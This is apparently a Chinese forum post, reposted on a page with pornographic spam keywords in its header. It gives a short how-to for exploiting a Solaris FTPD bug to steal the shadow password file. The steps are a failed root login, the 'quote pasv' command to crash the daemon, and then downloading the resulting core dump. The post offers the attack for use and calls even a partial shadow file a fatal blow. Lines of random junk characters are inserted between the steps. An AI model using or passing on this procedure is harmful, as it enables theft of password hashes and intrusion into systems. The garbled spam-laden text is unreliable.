亚洲色一色噜一噜噜噜_在线国产精品一区二区_91国自产拍 精品_国产伦三级一区二区
汶上信息港
標(biāo)題:
如何用FIP獲取shadow口令文件
[打印本頁(yè)]
作者:
雜七雜八
時(shí)間:
2011-1-12 21:01
標(biāo)題:
如何用FIP獲取shadow口令文件
該方法利用了Solaris 操作系統(tǒng)中FTPD的一個(gè)BUG,使得用戶可以獲得該機(jī)的口令文件。具體過(guò)程如下:
- c: W( e: x! o* Q! a
6 q$ k* C& D5 l4 f- U8 s- t
1.通過(guò) ftp 正常登錄到目的主機(jī)上
0 M! J/ f& W! |) B, z5 I7 Q
/ Q1 g; e5 g- g5 ^4 f) \7 t
2.輸入如下命令序列:
9 z! r* w" V; j
+ C8 b( U$ o; Z
ftp> user root wrongpasswd
! |, u4 J2 a: Z$ Q7 y; s
1 B! G, Y, w& c v: ]0 x- r4 D
ftp> quote pasv
2 j( W f' A8 F) Q W
6 p( u2 g2 f8 _5 G" S4 e! a
3.這時(shí),ftpd會(huì)報(bào)錯(cuò)退出,同時(shí)會(huì)在當(dāng)前目錄下生成一個(gè)core,口令文件就包含在這個(gè)core中。
# E C Y2 x' ~
- {, [! o1 W; P- O
4.再次進(jìn)入FTP >get core
; Z0 t+ p. e5 u2 J- j2 \$ V
' v2 M; U, b. P+ ~$ B
補(bǔ)充:雖然在core只有一部分shadow,但是對(duì)于系統(tǒng)來(lái)說(shuō)已經(jīng)是致命的打擊了
. B0 Z3 h* T$ [9 j5 q5 S; n
' K! u3 |. k2 R
歡迎光臨 汶上信息港 (http://loveproblemguru.com/)
Powered by Discuz! X3.5